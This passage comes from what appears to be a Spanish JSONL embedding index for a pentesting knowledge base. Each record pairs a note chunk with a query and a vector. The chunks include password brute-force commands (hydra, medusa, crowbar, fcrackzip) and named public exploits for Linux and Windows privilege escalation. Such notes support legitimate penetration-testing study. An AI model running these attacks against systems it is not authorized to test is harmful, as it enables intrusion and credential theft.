-0.01146, -0.00484, 0.00733]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks Β· Kerberoasting Β· Pass-the-Hash Β· OSCP MOC", "indexar": "con quΓ© programa puedo intentar romper archivos ZIP contraΓ­das por contraseΓ±a?", "v": [-0.03764, -0.01114, -0.21279, -0.11423, 0.05205, -0.10294, 0.06151, -0.00821, -0.13181, -0.06802, 0.10179, 0.01179, 0.07817, -0.02206, 0.02372, 0.00927, 0.10687, 0.07878, 0.14667, 0.00108, -0.01148, 0.02633, 0.0457, -0.10923, 0.05493, -0.01241, -0.06854, 0.02842, -0.09732, -0.20346, -0.14293, -0.11099, 0.10039, 0.0471, -0.01699, 0.16797, 0.10369, 0.12417, 0.0164, 0.07225, 0.12629, 0.11962, -0.12896, 0.13397, -0.05384, 0.03067, 0.01561, -0.02961, 0.06842, 0.01755, -0.08504, -0.01513, 0.02009, -0.03186, -0.00842, -0.08674, -0.03721, -0.04675, -0.02146, 0.05743, -0.03891, 0.16339, 0.04821, -0.00907, -0.06718, -0.06663, 0.01693, 0.02041, -0.08345, 0.19165, -0.00441, -0.01103, -0.03869, -0.01988, -0.03102, 0.0825, -0.01409, -0.05852, -0.03159, 0.02082, -0.02052, 0.03774, 0.00794, 0.05306, -0.05007, -0.06427, 0.025, -0.0297, 0.03387, -0.13031, 0.04408, 0.04798, -0.06046, 0.04694, -0.00383, -0.1343, 0.08768, 0.02772, -0.07632, 0.01401, -0.03875, 0.04115, -0.12345, 0.12455, -0.00606, 0.04487, 0.02426, 0.09651, 0.06253, -0.06883, 0.0275, -0.00956, -0.05773, 0.03702, -0.10585, 0.00609, -0.0964, -0.07441, 0.0222, 0.00661, -0.05669, 0.0132, -0.09073, 0.05186, 0.04661, 0.07684, 0.043, 0.12761, -0.06508, 0.04865, 0.09276, -0.01853, -0.01711, -0.02986, -0.06481, -0.00599, -0.00446, -0.08289, -0.07305, -0.02689, 0.0225, -0.02398, 0.03136, 0.06545, 0.01868, 0.03128, 0.00383, -0.05579, -0.00781, 0.01739, -0.00371, 0.00305, -0.00729, 0.04844, -0.06051, 0.05592, 0.00227, -0.09524, -0.02862, 0.04267, -0.07048, 0.04893, -0.07281, -0.00971, -0.00511, -0.04816, 0.03519, 0.05743, 0.07808, 0.00202, 0.03678, 0.07343, 0.00454, -0.036, -0.00408, 0.04641, 0.02683, -0.05423, -0.02047, -0.09157, -0.0572, 0.0152, 0.0391, 0.0274, 0.03351, -0.07467, 0.03555, 0.07263, 0.0597, -0.04183, 0.02378, 0.00499, -0.0256, 0.04165, -0.03541, -0.04304, -0.02656, 0.00922, -0.04542, -0.06648, -0.03814, 0.00612, -0.02267, -0.00859, 0.05286, 0.03379, -0.06102, -0.03364, 0.02594, 0.02294, 0.03322, -0.01359, 0.05754, -0.03521, -0.0437, -0.0446, -0.04974, 0.11635, -0.00553, 0.07573, 0.05585, 0.06524, 0.0263, 0.05301, -0.00164, -0.05185, 0.00555, -0.01147, 0.02283, 0.00433, -0.07331, -0.01126, 0.02896, 0.02819, 0.07364, -0.00823, -0.05883, -0.03726, -0.02342, -0.0139, -0.05492, 0.09709, -0.00316, -0.07575, -0.05967, 0.03116, -0.02285, 0.01866, 0.03382, 0.0479, -0.03746, 0.01768, -0.00574, -0.03199, 0.06927, 0.05842]} +{"tipo": "pregunta", "herramienta": "Cracking de contraseΓ±as", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Cracking de contraseΓ±as.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Online (servicio en vivo)\n```bash\nhydra -L users.txt -P rockyou.txt ssh://IP # ver Authentication attacks\nmedusa -h IP -u admin -P pass.txt -M smbnt\nfcrackzip -u -D -p rockyou.txt secret.zip # ZIP\ncrowbar -b rdp -s IP/32 -u admin -C pass.txt # RDP\n```\n\nRelacionado: Authentication attacks Β· Kerberoasting Β· Pass-the-Hash Β· OSCP MOC", "indexar": "quΓ© aplicaciΓ³n me sirve para realizar ataques de crackeo mediante credenciales guardadas en texto plano?", "v": [-0.16017, 0.09686, -0.27163, -0.10673, 0.09794, -0.08864, 0.10376, 0.04372, -0.00772, -0.01018, -0.05372, -0.03705, -0.07973, -0.15055, 0.12052, 0.02891, 0.07669, 0.01972, 0.15141, 0.00527, -0.05902, -0.10422, -0.08349, -0.02779, -0.13865, 0.03014, -0.06724, -0.0097, -0.11964, -0.05291, -0.00382, 0.05609, 0.06137, -0.06257, -0.01547, 0.01136, -0.04965, 0.04419, 0.04174, 0.13987, 0.02339, -0.04963, -0.12271, -0.06629, 0.03292, -0.04521, 0.07345, 0.09164, -0.08855, 0.00487, 0.00567, -0.01076, -0.14054, 0.01181, -0.0904, -0.02043, 0.16664, -0.0531, 0.01965, -0.0439, -0.11318, 0.07384, 0.06576, -0.0184, 0.00417, -0.05934, 0.04547, 0.08733, -0.04419, 0.01902, -0.05309, 0.04203, 0.05189, -0.00288, 0.01438, -0.01411, -0.02984, 0.02122, 0.07598, 0.00484, -0.00873, 0.03806, -0.10883, 0.04258, -0.11005, 0.02457, 0.03746, 0.04946, -0.0033, 0.00208, 0.0096, -0.01618, -0.05943, 0.00826, -0.02567, -0.06811, 0.00616, -0.04226, 0.04614, 0.08972, 0.10141, -0.22768, -0.07995, 0.03761, -0.07253, 0.06663, -0.03423, -0.02459, -0.03879, -0.03377, 0.03145, -0.03174, -0.06616, 0.00926, 0.00725, -0.02157, -0.05158, -0.06727, 0.0607, -0.07725, -0.13064, -0.01721, 0.00674, 0.03565, 0.03591, 0.03952, -0.02566, 0.07497, -0.09981, -0.02113, -0.05013, -0.04311, -0.05118, -0.01963, -0.05077, -0.02659, 0.05809, -0.08052, -0.02434, 0.026, 0.01304, 0.10475, -0.05991, 0.04116, 0.01268, 0.03727, 0.0, -0.02992, 0.05793, 0.00166, 0.03728, 0.01577, -0.0447, 0.03568, -0.10027, -0.03557, 0.02144, -0.07659, -0.0372, 0.09207, -0.05144, -0.01558, -0.06157, 0.09183, -0.04769, -0.06835, 0.01714, -0.05566, 0.09809, 0.10439, -0.01267, 0.06452, 0.03738, -0.06823, 0.04783, -0.01783, -0.00553, 0.0026, -0.04714, -0.07551, -0.02308, -0.05199, 0.00107, 0.06746, -0.03384, -0.04913, 0.05748, 0.02138, -0.02484, -0.01887, 0.01899, 0.00021, 0.02298, 0.0112, 0.0356, -0.07302, -0.04314, -0.03432, -0.03547, -0.00349, -0.06123, -0.08775, -0.02811, -0.03543, 0.09655, 0.10095, 0.00281, -0.01893, -0.04606, 0.15735, 0.06198, -0.03836, 0.08299, 0.00212, -0.03974, -0.00307, 0.07994, 0.04931, -0.01439, 0.01546, 0.02217, -0.02326, 0.05065, -0.00668, 0.0086, -0.00051, -0.01453, -0.03263, 0.00522, 0.0731, 0.00505, -0.0325, -0.00622, -0.05041, 0.03596, -0.02212, 0.00278, 0.00171, -0.04525, -0.06782, -0.05108, 0.0619, 0.02206, -0.03388, -0.06135, -0.03323, -0.08852, 0.03371, -0.01431, -0.05158, -0.01264, 0.02436, 0.04601, -0.00362, 0.05328, -0.04404]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Exploits conocidos (CVEs)\n\n> Exploits pΓΊblicos que aparecen una y otra vez. LocalΓ­zalos con searchsploit y **lΓ©elos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "indexar": "quΓ© programa me sirve para buscar exploits pΓΊblicos", "v": [-0.0554, 0.08213, -0.17961, -0.18136, 0.0813, -0.11219, 0.01897, -0.05653, -0.06297, -0.1224, 0.02421, -0.02024, 0.03301, -0.0195, -0.0232, -0.11253, 0.11163, -0.06821, 0.1595, 0.04087, -0.01669, 0.05258, 0.04786, -0.08535, -0.09807, 0.01141, 0.02817, -0.10449, -0.03618, -0.00796, -0.05433, 0.07909, -0.02645, -0.12698, 0.02079, 0.02327, 0.12334, -0.07054, -0.02087, 0.04269, 0.09025, -0.02358, -0.13493, 0.00024, 0.06223, -0.06466, -0.00078, -0.02352, -0.07464, -0.0255, -0.05517, -0.02582, -0.08895, 0.0088, 0.04044, -0.05458, -0.09667, -0.04879, -0.12216, 0.01714, -0.14284, -0.09367, 0.04684, -0.05176, 0.09247, -0.08015, 0.17073, 0.03912, -0.10659, 0.07496, -0.00322, 0.02747, 0.0904, -0.02605, -0.07917, -0.00911, -0.01177, -0.05717, -0.00381, -0.00065, -0.04537, -0.00836, -0.03598, 0.06185, -0.03706, -0.01055, 0.10881, 0.03481, -0.01737, -0.02965, 0.04945, 0.06584, -0.04399, 0.04035, 0.01909, -0.03405, 0.1367, 0.00373, -0.01223, 0.14218, 0.01567, -0.15135, -0.13676, 0.03508, -0.10435, 0.07238, 0.03471, -0.03403, -0.09717, 0.05872, 0.03675, -0.04914, -0.03321, 0.00753, 0.02361, 0.02015, -0.03601, -0.08071, -0.00084, -0.04916, -0.11661, 0.02991, -0.05348, 0.00518, 0.14601, -0.02678, 0.00352, 0.04649, 0.02193, 0.0505, 0.04379, 0.0693, 0.02531, 0.05152, -0.01385, -0.13127, 0.06267, -0.07028, -0.0131, -0.04984, 0.07984, 0.04991, -0.004, -0.0332, -0.04673, -0.02199, 0.09633, -0.03717, 0.04624, -0.06391, -0.00368, -0.10834, -0.05189, 0.03751, -0.03899, -0.07868, 0.02752, -0.04343, -0.08355, 0.0598, -0.05638, -0.04495, -0.015, -0.07163, 0.06495, -0.0036, -0.03049, -0.00367, 0.0844, 0.07268, 0.01242, 0.06568, 0.0613, -0.13408, 0.05951, -0.06322, -0.05048, -0.0502, 0.02874, 0.01857, -0.092, 0.01191, 0.10986, 0.0679, -0.01773, -0.06509, 0.00031, -0.04117, 0.01289, -0.08867, 0.05501, -0.07134, 0.05873, 0.03067, -0.00295, -0.01427, -0.01194, 0.02207, 0.04283, -0.08314, -0.03716, -0.01453, -0.01874, 0.01076, 0.05679, 0.05379, 0.0169, -0.0216, 0.03795, 0.13252, 0.03153, 0.01249, 0.05283, -0.00831, -0.05631, 0.0084, 0.01579, 0.05888, 0.00657, 0.03805, -0.02585, 0.00427, 0.01029, 0.06373, 0.01149, -0.04751, -0.03164, -0.05813, -0.02366, -0.01314, -0.00203, -0.06784, -0.00337, -0.0008, -0.02095, -0.09805, -0.02943, -0.00286, 0.00792, -0.07827, -0.02799, 0.08256, 0.00134, -0.03228, -0.00884, 0.00139, -0.00187, -0.01498, -0.00804, 0.02032, -0.02746, -0.00364, -0.01253, -0.04438, 0.08039, 0.00906]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Exploits conocidos (CVEs)\n\n> Exploits pΓΊblicos que aparecen una y otra vez. LocalΓ­zalos con searchsploit y **lΓ©elos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "indexar": "cual es la herramienta para revisar vulnerabilidades conocidas", "v": [0.08065, 0.07985, -0.17461, -0.09664, 0.08736, -0.11293, -0.07771, -0.10408, -0.04481, -0.11799, 0.04535, -0.1291, -0.04747, 0.01622, 0.06308, 0.08218, 0.04065, -0.09741, 0.02809, -0.00142, -0.00079, -0.06685, -0.06222, -0.02048, -0.17567, 0.02725, -0.01627, -0.00378, -0.07219, 0.00274, -0.01291, -0.0222, 0.07966, -0.02745, -0.11473, 0.13469, 0.05789, 0.0191, 0.00613, 0.09101, 0.04943, 0.02997, -0.04592, 0.01304, 0.05393, -0.08305, -0.1385, 0.02436, -0.00786, 0.02476, -0.07238, -0.01325, -0.1678, -0.04274, -0.01277, -0.19739, 0.18264, -0.00199, -0.04447, -0.00114, -0.10489, 0.00968, 0.05308, -0.04232, -0.04798, -0.07917, -0.06668, -0.01781, -0.14198, 0.11002, 0.04604, 0.04355, -0.00773, -0.00072, -0.03779, -0.0565, 0.07901, 0.05048, 0.0341, -0.05681, 0.05822, 0.00415, -0.03184, 0.11133, -0.1521, -0.11312, 0.01058, -0.07101, 0.05801, -0.0269, 0.04037, 0.04528, -0.05817, 0.0182, 0.0349, 0.02629, 0.12564, -0.05597, -0.11934, -0.0245, 0.03528, -0.04957, -0.01404, 0.07979, 0.04395, 0.02788, -0.11749, 0.01579, -0.05324, -0.06277, -0.00754, 0.0482, -0.05435, -0.02601, 0.0317, 0.13785, -0.06138, -0.077, 0.06608, -0.03515, 0.00124, -0.01529, -0.1077, -0.07741, 0.06074, 0.03899, 0.02749, 0.02062, 0.00844, -0.09547, 0.03848, -0.09003, -0.06008, 0.03376, -0.00575, 0.01521, 0.01934, -0.11608, -0.03777, -0.05365, 0.01723, 0.04694, -0.0204, 0.00333, 0.03883, 0.0607, 0.04432, -0.04272, -0.08859, 0.07381, 0.03277, -0.01964, -0.02392, 0.06124, -0.02229, -0.00517, -0.08716, 0.01326, -0.08095, 0.05233, -0.05866, -0.01838, 0.02399, 0.01921, 0.01886, -0.02825, 0.08955, 0.05725, 0.12848, 0.03428, 0.03802, 0.00392, 0.04097, 0.04424, -0.01153, -0.10916, -0.03816, -0.0153, 0.01137, -0.06443, -0.02184, -0.03197, -0.05694, -0.02762, 0.015, -0.00854, 0.05246, 0.00994, 0.06271, 0.03676, -0.03158, -0.05301, -0.00224, -0.08019, 0.09333, 0.01867, -0.03601, -0.02275, 0.01399, -0.01347, -0.07495, -0.02868, -0.06999, -0.06675, 0.10643, 0.04976, -0.00886, -0.05597, -0.05104, 0.06086, 0.04596, 0.00659, 0.04509, 0.02084, 0.01711, -0.06419, -0.0268, 0.02701, -0.00892, -0.01772, -0.02723, 0.00571, 0.08644, 0.0162, -0.04169, 0.04109, -0.01022, 0.01019, -0.00611, -0.04844, 0.03859, -0.01446, -0.06779, -0.05373, 0.07073, -0.05425, 0.03321, -0.05446, -0.05324, -0.01435, 0.02821, 0.01913, -0.01625, -0.06487, -0.01046, -0.03111, 0.00354, -0.03796, -0.07008, -0.06358, -0.04744, 0.03779, 0.04823, -0.09793, 0.03385, -0.11573]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Exploits conocidos (CVEs)\n\n> Exploits pΓΊblicos que aparecen una y otra vez. LocalΓ­zalos con searchsploit y **lΓ©elos antes de lanzarlos**. Fuente: oscp.trastero.org/exploits.", "indexar": "con quΓ© puedo encontrar ataques repetidos que ya existen", "v": [-0.05005, 0.22851, -0.1557, 0.03923, 0.06017, 0.04514, 0.02492, 0.05265, -0.01986, -0.01554, 0.02703, -0.03824, -0.01715, 0.00817, 0.1624, 0.00447, -0.01741, 0.01855, 0.19754, -0.07333, -0.01918, -0.13347, -0.00829, 0.02597, -0.03138, -0.04501, -0.01506, 0.12679, -0.05422, -0.07904, -0.01725, 0.01753, 0.00055, 0.01057, -0.13148, 0.05279, 0.01197, 0.16638, 0.05761, 0.01154, 0.01858, -0.02554, -0.22476, -0.13359, 0.0535, 0.02565, -0.09601, -0.00088, -0.03382, 0.00743, 0.04673, 0.0177, -0.15955, -0.05733, -0.02355, -0.11571, 0.02936, -0.06519, 0.08864, -0.02781, -0.11723, 0.05974, 0.11499, -0.06957, 0.03812, -0.03831, 0.00468, -0.01914, -0.00718, 0.02878, -0.04646, 0.01472, -0.04354, 0.03207, 0.06112, 0.06129, 0.06598, 0.02382, 0.0554, 0.01747, 0.00361, -0.05813, -0.08432, -0.0552, -0.11312, -0.04012, -0.02764, -0.03161, -0.05906, -0.16362, 0.04095, -0.01746, -0.06648, -0.02225, -0.05055, 0.03539, -0.02756, -0.08366, -0.09017, 0.03294, -0.05408, 0.04778, -0.10964, 0.03568, -0.01185, 0.04959, 0.00225, -0.01877, 0.0341, -0.15114, -0.04516, -0.11644, -0.00494, -0.07848, 0.011, -0.05016, -0.03773, -0.01539, 0.07902, -0.01412, -0.0742, 0.05831, 0.00324, 0.0829, 0.00701, 0.033, 0.00121, 0.00716, -0.03168, -0.07495, 0.00093, 0.066, 0.07322, -0.05413, -0.04929, 0.05474, 0.03462, -0.06084, -0.00366, -0.0055, 0.09952, 0.13061, 0.01827, -0.02778, 0.01931, 0.07263, -0.01974, -0.04108, -0.10395, -0.02391, -0.02911, 0.02253, 0.05147, 0.07461, -0.00818, -0.0182, 0.02541, -0.09291, -0.02417, 0.12967, -0.00772, 0.06715, -0.06859, 0.04261, -0.05331, 0.00266, -0.01975, -0.01468, 0.05419, 0.05443, -0.05242, 0.09938, 0.02855, -0.12712, -0.0084, -0.06956, -0.04047, -0.07239, -0.00527, -0.04972, -0.08186, -0.07487, -0.0758, 0.02373, 0.04571, -0.03532, 0.06826, 0.08166, 0.0334, 0.03288, 0.06668, -0.01155, 0.02053, 0.01371, 0.00552, -0.05218, -0.02218, -0.01806, -0.03125, -0.02259, -0.03328, -0.02014, -0.04527, -0.03217, 0.11108, 0.01878, -0.06349, -0.06105, -0.03078, 0.03964, 0.0114, -0.02217, 0.0888, -0.06768, -0.08752, -0.0286, 0.04736, -0.03738, -0.01935, -0.03914, 0.03837, 0.0221, 0.06313, -0.01382, 0.00974, -0.0479, -0.06055, -0.04015, 0.09086, 0.11241, 0.00462, -0.01163, -0.01111, -0.07608, 0.00289, -0.03036, 0.01225, -0.02672, -0.03603, 0.06844, -0.02357, 0.03515, -0.01196, -0.05371, 0.00631, -0.07538, -0.06513, 0.02458, -0.05052, 0.00689, 0.027, 0.04552, -0.02972, -0.02882, 0.03352, -0.02169]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) β†’ casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel β‰₯5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versiΓ³n: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "indexar": "que programa hay para hacer privesc local en Linux sin instalar dependencias?", "v": [0.05805, 0.10632, -0.17353, -0.20967, 0.07908, -0.15386, -0.07004, -0.01081, -0.11717, 0.03898, 0.04633, -0.01153, -0.04041, -0.12652, 0.0342, -0.02785, -0.0626, -0.17049, 0.00568, 0.00062, -0.12011, 0.14328, -0.09013, 0.08446, 0.06307, 0.07843, 0.08553, -0.15762, -0.04437, -0.04147, -0.00761, 0.05318, -0.01707, 0.02618, 0.01302, 0.02244, 0.04385, -0.06996, 0.08904, 0.04083, 0.11607, 0.00817, 0.02107, 0.10567, -0.05594, -0.15784, 0.03581, -0.07059, 0.03557, -0.12938, -0.04912, 0.02147, 0.01747, -0.08054, 0.08195, -0.01933, 0.02852, -0.16875, 0.0533, 0.02771, -0.17385, 0.04838, 0.00379, 0.03891, 0.10749, 0.05562, 0.02766, 0.01733, -0.09004, -0.01806, 0.01476, 0.04083, -0.00438, -0.02785, -0.0382, 0.08567, -0.08879, -0.04328, 0.10282, -0.05817, 0.01915, 0.01151, 0.1085, 0.07382, -0.08951, -0.14142, 0.03368, 0.04798, -0.00101, 0.02742, 0.02241, 0.00965, 0.0093, 0.08037, 0.09801, -0.07132, 0.11631, 0.12923, 0.06353, 0.07399, 0.00773, -0.02524, -0.01312, 0.15053, 0.00854, -0.01204, 0.07124, -0.05207, 0.03154, 0.01344, 0.05789, 0.03101, -0.0198, -0.01053, -0.07759, -0.00426, -0.02971, 0.03175, -0.02965, -0.00412, -0.08977, -0.01493, -0.04735, -0.00867, -0.02061, -0.05993, -0.04306, 0.14384, -0.05615, 0.03245, 0.06965, -0.1184, 0.07508, 0.01262, -0.05941, 0.02013, 0.0271, -0.07753, -0.04354, -0.05372, 0.02566, 0.02994, 0.05568, 0.02701, 0.03476, 0.04221, -0.024, -0.04919, -0.00562, -0.02762, 0.03605, 0.04012, -0.04398, 0.02047, -0.10701, -0.03676, 0.07853, -0.03968, 0.02678, 0.00801, -0.02194, -0.01812, 0.01902, -0.05051, -0.01737, -0.04413, -0.03531, 0.11468, 0.05999, 0.06294, -0.01329, 0.10938, -0.01569, -0.06415, 0.02396, -0.09068, 0.09697, -0.05594, 0.0279, 0.02558, -0.03946, 0.08348, 0.02672, 0.01376, 0.02535, -0.00665, -0.09293, -0.00049, -0.02449, 0.00535, 0.01838, -0.04359, -0.03688, -0.00877, 0.00825, 0.02758, -0.02087, 0.00087, -0.01064, -0.00613, -0.09343, 0.04015, -0.03471, -0.0136, 0.03896, 0.08312, -0.0312, 0.00981, -0.00097, 0.08118, 0.02027, 0.02281, 0.00536, -0.00754, 0.00472, -0.02972, 0.01146, 0.01939, 0.06343, 0.04408, 0.00387, -0.01989, 0.05552, 0.00277, 0.00197, -0.07135, 0.04727, 0.04317, 0.04407, 0.04158, -0.01681, -0.02485, 0.02606, -0.00975, -0.0184, -0.01534, 0.01306, 0.01176, 0.01286, -0.0801, -0.03306, 0.0773, 0.01139, -0.08441, -0.11584, -0.03394, -0.04214, -0.00289, -0.02213, -0.03337, -0.00258, 0.01932, 0.05711, 0.00772, -0.01699, 0.02745]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) β†’ casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel β‰₯5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versiΓ³n: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "indexar": "con que puedo explotar la vulnerabilidad de pkexec sin necesidad de herramientas externas?", "v": [0.2082, 0.05482, -0.1968, -0.06659, 0.05413, -0.04451, 0.00383, 0.00436, 0.01294, -0.05508, 0.00324, 0.04261, -0.04917, -0.00532, -0.00476, 0.06112, -0.03774, -0.06562, -0.02472, 0.03299, 0.01374, -0.05838, -0.0476, -0.01825, -0.02427, 0.09623, -0.07018, -0.00335, -0.15172, -0.0367, -0.08816, 0.10223, 0.02472, -0.0691, 0.0713, 0.0735, -0.03851, 0.03664, 0.11363, 0.05577, 0.05785, 0.05145, -0.10957, 0.00845, 0.04762, -0.01331, -0.0506, -0.03771, 0.04308, 0.05389, -0.09422, -0.10895, -0.24008, -0.07591, 0.10891, -0.08562, 0.20967, -0.10244, 0.01446, 0.04681, -0.10229, 0.11267, 0.072, -0.0475, 0.03328, -0.02083, -0.00818, -0.00371, -0.13845, 0.10589, -0.0809, -0.01074, -0.01387, -0.00152, 0.03842, -0.08157, -0.0142, 0.02963, 0.0154, 0.01494, -0.02329, 0.10254, -0.02929, 0.00981, -0.1089, -0.05321, 0.1901, -0.03188, 0.07947, -0.08295, 0.0936, -0.01089, -0.08226, -0.01847, 0.05058, -0.06721, 0.05866, 0.03511, 0.02574, 0.03593, 0.00441, -0.03826, -0.03603, 0.07582, 0.07717, 0.03603, -0.02516, -0.03053, 0.05021, -0.03304, -0.0014, -0.02599, -0.01111, -0.06254, -0.02826, -0.02261, -0.13315, -0.07486, -0.04423, -0.04008, -0.03199, -0.08376, -0.00695, -0.00406, -0.01123, -0.08602, -0.05375, 0.03702, 0.04575, -0.10524, 0.0012, -0.00409, 0.00839, 0.0083, -0.01433, -0.00032, 0.05395, -0.06222, -0.03667, -0.0954, 0.04411, 0.00084, 0.00536, -0.06153, 0.04646, 0.07492, -0.00286, -0.02714, -0.05618, 0.01984, 0.02106, -0.03369, 0.02573, 0.1168, -0.08464, -0.01542, -0.01691, -0.00279, 0.02236, 0.08438, -0.05685, 0.02093, -0.0037, 0.02243, 0.00689, 0.00537, 0.05664, -0.00813, 0.05332, 0.04018, 0.01519, 0.03222, 0.09964, 0.03718, 0.00976, -0.0889, -0.02863, -0.08425, -0.0062, -0.0748, -0.04891, -0.00431, -0.07547, -0.06585, -0.03686, 0.00401, 0.02042, -0.03822, 0.05696, 0.01613, -0.00602, -0.00811, -0.02314, 0.03774, 0.03873, -0.06036, -0.02498, -0.00449, 0.00204, -0.08959, -0.04624, 0.01504, -0.0274, -0.07794, 0.12529, 0.08092, -0.04984, 0.04169, -0.0817, 0.03913, 0.08159, -0.02635, 0.11989, -0.08858, -0.0653, -0.01813, 0.04018, 0.04822, 0.01387, 0.04959, 0.02791, 0.03168, 0.08908, -0.03347, 0.03978, 0.03507, -0.02897, -0.00428, 0.06237, 0.05652, -0.02871, 0.03524, -0.0592, -0.02958, 0.08312, -0.00731, 0.02435, -0.0492, -0.07121, -0.02738, 0.02508, 0.05736, -0.02462, -0.05322, -0.0171, -0.05825, -0.07601, -0.00106, 0.0129, -0.08755, -0.06545, 0.0769, 0.06456, -0.06782, 0.03345, -0.07289]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Linux (privesc local)\n```\nCVE-2021-4034 PwnKit / pkexec (polkit) β†’ casi universal, sin dependencias\nCVE-2021-3156 Baron Samedit (sudo)\nCVE-2022-0847 Dirty Pipe (kernel β‰₯5.8)\nCVE-2016-5195 Dirty COW (kernel viejo)\nCVE-2012-0056 Mempodipper\n```\nComprueba versiΓ³n: `uname -a`, `sudo --version`, y mira Privesc Linux antes del kernel exploit.", "indexar": "cual es una alternativa libre a las pruebas manuales de versiones en un sistema Linux?", "v": [0.0029, 0.03808, -0.06373, -0.15012, -0.08681, -0.10209, -0.14401, -0.03906, -0.11144, -0.04698, -0.03587, -0.15862, 0.00092, -0.00363, 0.08935, -0.08464, -0.00538, -0.17618, 0.01692, -0.11563, -0.15022, -0.00271, -0.20374, -0.06726, 0.04383, 0.05504, 0.05957, -0.11492, 0.02197, 0.03116, -0.07398, 0.05608, 0.07778, -0.00362, -0.09699, 0.10921, 0.05425, 0.02318, 0.12811, 0.07235, 0.12357, -0.07915, 0.02729, 0.06153, -0.04477, -0.19456, 0.02695, 0.02817, 0.02989, -0.10229, -0.00655, -0.02753, -0.07236, 0.00557, 0.08726, -0.10139, 0.1526, -0.09786, 0.00918, 0.00939, -0.09283, 0.01814, 0.04523, -0.02887, 0.07975, 0.01583, -0.06319, -0.04908, -0.11319, 0.09177, 0.05654, 0.0878, 0.03881, -0.02383, -0.14167, 0.04408, -0.07647, 0.01543, -0.02728, 0.02702, 0.04445, -0.04478, -0.01692, 0.10039, -0.04193, -0.14012, 0.03215, -0.02353, -0.01874, 0.05044, 0.05713, -0.01521, 0.03396, 0.14479, 0.12059, -0.05505, 0.08259, 0.10113, 0.00527, -0.03301, 0.00192, 0.0367, -0.10455, 0.04368, -0.07101, -0.04628, 0.03184, 0.011, -0.01932, -0.03342, 0.03478, 0.02074, 0.00166, 0.04834, -0.06403, -0.0122, 0.0061, 0.04717, -0.08264, -0.00708, -0.03243, 0.01627, -0.06773, -0.09418, 0.02719, 0.01924, 0.05713, 0.10363, -0.03501, -0.00373, 0.12547, -0.05687, -0.04399, 0.00152, -0.05649, 0.02936, 0.03792, -0.03111, -0.00361, -0.01921, -0.02255, 0.06909, 0.06316, -0.03059, 0.09299, -0.00536, 0.00066, -0.05152, 0.017, -0.08288, -0.0959, 0.00972, -0.01839, 0.06734, -0.0966, -0.04674, 0.01184, -0.02717, -0.06215, 0.02919, 0.04376, -0.02055, 0.00823, 0.00277, -0.03413, 0.02959, -0.01595, -0.00818, -0.02185, -0.00271, 0.03782, 0.07534, 0.02745, -0.02242, 0.09041, -0.06028, 0.02397, -0.10992, -0.01556, 0.00864, -0.00326, 0.0585, -0.05701, -0.0363, 0.04992, -0.00422, -0.03638, 0.05622, 0.04725, 5e-05, 0.04342, 0.06313, -0.03612, -0.05023, 0.01321, 0.07888, -0.00748, -0.04765, -0.04646, 0.01155, -0.14888, -0.01164, -0.01983, -0.06317, -0.01466, 0.03035, -0.00457, 0.04197, 0.02542, 0.03636, 0.0244, 0.07364, 0.06925, -0.01291, -0.04123, 0.01044, -0.00792, 0.01346, 0.01157, -0.05179, 0.02945, -0.00711, 0.04437, 0.01837, -0.0443, -0.03271, 0.01841, 0.04865, -0.01696, -0.03543, 0.04938, -0.02466, 0.04209, 0.04294, 0.0008, -0.0191, 0.02723, 0.06347, 0.01449, -0.08601, -0.00883, 0.10552, 0.02186, -0.06252, -0.05459, -0.04721, -0.05986, -0.06042, -0.01499, -0.05595, -0.06605, 0.02793, 0.00449, -0.03119, -0.01754, 0.01152]} +{"tipo": "pregunta", "herramienta": "Exploits conocidos", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Exploits conocidos.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows\n```\nMS17-010 EternalBlue (SMBv1) β†’ foothold remoto\nPrintNightmare CVE-2021-1675 / 34527 β†’ privesc/RCE vΓ­a 